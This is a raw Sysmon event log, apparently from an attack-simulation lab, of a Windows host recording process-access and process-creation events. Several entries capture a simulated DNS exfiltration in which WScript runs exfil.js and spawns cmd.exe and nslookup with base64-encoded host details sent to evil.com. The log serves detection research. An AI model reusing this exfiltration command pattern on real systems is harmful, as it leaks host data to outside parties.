14:16:09.757{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195157Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.757{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-243E-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195156Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.757{2E1864BB-17A1-629A-783D-000000005F02}55527780C:\Windows\System32\WScript.exe{2E1864BB-17A9-629A-243E-000000005F02}7208C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195155Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.759{2E1864BB-17A9-629A-243E-000000005F02}7208C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljpme.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195154Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.742{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhlilwl.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195153Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.726{2E1864BB-17A9-629A-223E-000000005F02}5108512C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-233E-000000005F02}3732C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195152Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.726{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195151Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.726{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.726{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.726{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.726{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-233E-000000005F02}3732C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.726{2E1864BB-17A9-629A-213E-000000005F02}7564924C:\Windows\system32\cmd.exe{2E1864BB-17A9-629A-233E-000000005F02}3732C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.725{2E1864BB-17A9-629A-233E-000000005F02}3732C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A9-629A-213E-000000005F02}7564C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhlilwl.tmp 2>&1 10341000x8000000000000000195145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.688{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-223E-000000005F02}5108C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.688{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-223E-000000005F02}5108C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.688{2E1864BB-17A9-629A-223E-000000005F02}5108512C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-213E-000000005F02}7564C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.672{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-223E-000000005F02}5108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.672{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.672{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.672{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-213E-000000005F02}7564C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.672{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.672{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.672{2E1864BB-17A1-629A-783D-000000005F02}55527988C:\Windows\System32\WScript.exe{2E1864BB-17A9-629A-213E-000000005F02}7564C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.672{2E1864BB-17A9-629A-213E-000000005F02}7564C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhlilwl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.641{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlaegw.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000195133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.609{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=253265D601F17233FCB20F805EB278FF,SHA256=7FFEC6B048B9EFA78CA0F80676E1BC58B5319F5258EE510642368C3B445DA55A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.588{2E1864BB-17A9-629A-1F3E-000000005F02}76888152C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-203E-000000005F02}7804C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.588{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.588{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.588{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.588{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.588{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-203E-000000005F02}7804C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 